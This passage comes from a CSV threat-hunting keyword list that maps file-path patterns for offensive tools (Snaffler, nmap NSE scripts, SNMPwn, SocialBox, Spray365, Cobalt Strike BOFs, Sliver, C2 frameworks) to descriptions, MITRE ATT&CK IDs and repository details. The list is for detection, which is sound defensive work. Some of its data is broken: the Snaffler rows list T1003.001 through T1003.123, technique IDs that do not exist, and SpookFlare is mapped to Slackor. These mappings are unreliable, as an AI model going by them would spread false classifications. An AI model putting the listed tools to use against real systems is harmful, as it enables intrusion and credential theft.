T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/SnaffCon/Snaffler*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/SnaffCore/*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/snafflertest/*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/SnaffPoint.git*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,1,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*/sniff.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/sniffer.git*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,1,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -*/sniffer-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-hh3c-logins.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-ios-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-netstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-sysdescr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-software.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmpwn.git*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,1,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*/snmpwn.rb*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,1,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*/SocialBox.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/SocialBox-Termux*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,10,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/SocialPwned*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*/socks-auth-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/socks-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/socks-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/spacerunner.exe*,greyware_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*/SpaceRunner.git*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*/SpamChannel.git*,offensive_tool_keyword,SpamChannel,poof emails from any of the +2 Million domains using MailChannels,T1566 - T1566.001,TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/SpamChannel,1,1,N/A,8,3,256,28,2023-09-21T12:25:03Z,2022-12-20T21:31:55Z -*/spawn.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,1,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -*/spellbound.git*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*/spellgen.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*/spellstager.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*/spider.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/SpiderFoot-*.log.cs*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/SpiderFoot.csv*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/spiderfoot.git*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*/SpiderMate/Jatayu*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*/splunk_whisperer.git*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*/SplunkWhisperer2.git*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*/spoof/dns*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/spoof/mdns*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/spoof/spoof_windows.*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/SpookFlare.git*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/spoolsystem/SpoolTrigger/*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/spray/spray.py*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*/Spray365*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*/Spray-AD.*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*/SprayAD.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*/Spray-AD/*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 